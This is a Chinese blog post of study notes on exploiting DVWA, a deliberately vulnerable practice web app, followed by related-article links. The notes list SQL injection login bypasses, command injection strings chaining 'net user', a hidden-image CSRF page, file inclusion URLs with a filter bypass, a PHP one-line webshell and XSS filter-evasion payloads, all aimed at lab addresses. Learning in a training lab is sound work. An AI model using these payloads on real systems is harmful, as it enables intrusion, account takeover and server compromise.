DVWA漏洞学习

最新推荐文章于 2023-08-28 21:36:21 发布
最新推荐文章于 2023-08-28 21:36:21 发布
阅读量200 收藏
点赞数 1
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42143925/article/details/105065800
版权

Brute Force

  • Low
  1. 利用burpsuite即可完成(复制粘贴会出现400 bad request错误)

抓包,按ctrl+i或action下的send to intruder 设置参数 设置字典 开始破解

    2.手工sql注入

1. Username:admin' or'1'='1 Password:(空)

2. Username :admin'# Password :(空)

SELECT * FROM `users` WHERE user='$user' AND password='$pass';

  • High

python脚本

Command Injection(命令行注入)

  • Low
  1. 127.0.0.1&&net user window和linux系统都可以用&&来执行多条命令
  • Medium
  1. 127.0.0.1&net user 用一个&代替&& &:第一个成功在执行第二个
  2. 127.0.0.1&;&ipconfig
  • High
  1. 127.0.0.1|net user

 

CSRF(跨站请求伪造)

  • Low
  1. http://192.168.153.130/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change# 点击发送http请求就修改密码 CSRF最关键就是利用受害者的cookie向服务器发送伪造请求,如果之前用谷歌登录,后在火狐打开有害链接,不会修改密码,会跳到登录界面。
  2.  

<img src="http://192.168.153.130/dvwa/vulnerabilities/csrf/?password_new=hack&password_conf=hack&Change=Change#" border="0" style="display:none;"/> <h1>404<h1> <h2>file not found.<h2>

 

 

File Inclusion(文件包含)

  • Low
  1. 本地文件包含 http://192.168.140.132/dvwa/vulnerabilities/fi/?page=/1.txt 打开了服务器本地的根目录下的一个文件夹
  2. 远程文件包含http://192.168.140.132/dvwa/vulnerabilities/fi/?page=http://192.168.140.1:8081/Webhello/1.txt 打开远程服务器下的一个文件 调用里面的函数
  • Medium
  1. http://192.168.153.130/dvwa/vulnerabilities/fi/page=htthttp://p://192.168.140.1:8081/Webhello/1.txt medium会删除"http://" 因此此路径删除后还有一个http://
  • High

File Upload(文件上传)

  1. 上传一句话木马: <?php @eval($_POST['apple']); ?>
  2. 使用中国菜刀发送post请求

Insecure CAPTCHA(不安全的验证码)

SQL Injection(SQL注入)

SQL Injection(Blind)(SQL盲注)

XSS(Reflected)(反射型跨站脚本)

  • Low
  1. <script>alert(/xss/)</script>
  • Medium
  1. <sc<script>ript>alert(/xss/)</script>
  2. <ScRipt>alert(/xss/)</script>
  • High

通过img、body等标签的事件或者iframe等标签的src注入恶意的js代码

<img src=1 οnerrοr=alert(/xss/)>

 

亮哥神话
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA靶场,集成了owasp top 10漏洞
03-28
DVWA靶场,集成了owasp top 10漏洞,可以在这里面进行学习漏洞原理、利用和危害
常见的Web漏洞——命令注入
热门推荐
江左盟的博客
09-29 1万+
目录 命令注入简介 命令注入原理 漏洞利用 漏洞防范 总结 命令注入简介 命令注入漏洞和SQL注入、XSS漏洞很相似,也是由于开发人员考虑不周造成的,在使用web应用程序执行系统命令的时候对用户输入的字符未进行过滤或过滤不严格导致的,常发生在具有执行系统命令的web应用中,如内容管理系统(CMS)等。 命令注入原理 本文以DVWA中的Command Injection为例,查看...
web安全---RCE(远程命令/代码执行)原理及DVWA漏洞演示
qq_46217803的博客
05-20 4077
简介 RCE为两种漏洞的缩写,分别是"远程命令/代码执行",攻击者可以远程命令注入系统命令或者代码,从而拿下目标服务器 RCE 漏洞形成 远程系统命令执行(简称命令注入)是一种注入漏洞。攻击者构造payloads让受害者操作系统执行该命令。当Web应用程序代码包含操作系统调用并且调用中使用了用户输入时,才可能进行OS命令注入攻击。这时候,用户提交的系统命令会直接在服务器中执行,并返回。命令注入漏洞可能会出现在所有让你调用系统外壳命令的语言,如c,python,php等。 注:命令注入并..
dvwa靶场上的 RCE漏洞+暴力破解的简单学习
太阳照耀我走四方
02-14 729
针对dvwa靶场的 RCE漏洞 + 暴力破解的简单学习
DVWA之命令注入漏洞
weixin_56306210的博客
02-06 2020
DVWA之命令注入漏洞
DVWA学习笔记全等级
06-08
DVWA学习笔记全等级
DVWA通关手册.docx
08-19
文档内部包含DVWA平台,所有类型漏洞低中高等级的攻击过程,非常仔细。也有部分自己的攻击方法,值得一试。
DVWA参考答案
10-03
该答案为参考答案,突破漏洞的方法有多样,本文档提供一个参考。方便后人学习
dvwa软件包
12-09
dvwa软件包,web攻防学习程序,配合"Web漏洞实战教程(DVWA的使用和漏洞分析)2013完整版"文档学习web攻防.
DVWA通关攻略之命令注入
勿山几已
05-06 1980
简要介绍命令注入漏洞,演示手工和burp爆破挖掘命令注入漏洞/RCE
【无标题】Dvwa靶场文件上传漏洞学习
m0_62636343的博客
09-03 634
Dvwa靶场文件上传漏洞学习笔记
DVWA之命令执行漏洞(RCE漏洞
qq_51230014的博客
08-28 360
①过滤命令连接符,将特殊字符转换成空格(注意对命令连接符的识别要注意空格多一个和少一个情况不一样,ctf中可能遇到 ),DVWA high防御中缺少对 |的检测。DVWA之命令执行漏洞(RCE漏洞):(属于黑盒测试)4、 命令执行漏洞的防御。1、命令连接符的使用。
DVWA下载、安装及使用教程,网络安全小白必看!
hack0919的博客
06-12 5181
DVWA是一款基于PHP和mysql开发的web靶场练习平台,集成了常见的Web漏洞
【P4】Windows 下搭建 DVWA 及命令注入漏洞详解
qq_45138120的博客
06-24 4348
包括 Windows 下六步搭建 DVWA、危害巨大的漏洞 – 命令注入、解决 DVWA 乱码问题、Command Injection 命令注入解决方法、防御漏洞之防御 low、命令注入漏洞之防御 Medium、命令注入漏洞之防御 high、命令注入漏洞之防御 impossible。
DVWA之命令执行漏洞复现
weixin_43263451的博客
07-19 1107
命令执行漏洞漏洞原理当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。在操作系统中,“&、|、||”都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的...
DVWA--文件上传漏洞
xiaoxiao的博客
11-28 1458
文件上传漏洞定义 文件上传漏洞通常是由于上传文件的类型、内容没有进行严格的过滤检查,使得可以通过上传webshell获取服务器权限,因此文件上传漏洞带来的危害通常是毁灭性的。 文件上传漏洞的前提 能上传的木马 上传的木马可执行 还要清楚上传后的路径 实现过程 LOW级别 源码 basename(path,suffix):返回path中的文件名部分,如果可选参数suffix为空,则返回的文...
dvwa中的文件上传漏洞
无痕的博客
01-12 6474
dvwa漏洞环境演示文件上传漏洞
漏洞靶场——DVWA+命令执行漏洞
woo233的博客
08-07 2970
DVWA是OWASP官方编写的PHP网站,包含了各种网站常见漏洞
dvwa文件上传漏洞】--文件上传漏洞总结
m0_63241485的博客
08-30 3445
文件上传漏洞--dvwa
dvwa靶场漏洞讲解
最新发布
09-13
DVWA(Damn Vulnerable Web Application)是一个用于学习和练习网络安全的漏洞测试平台。它模拟了各种常见的Web应用程序漏洞,供安全研究人员、渗透测试人员和开发人员使用。 下面是一些DVWA中常见漏洞的简要讲解:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值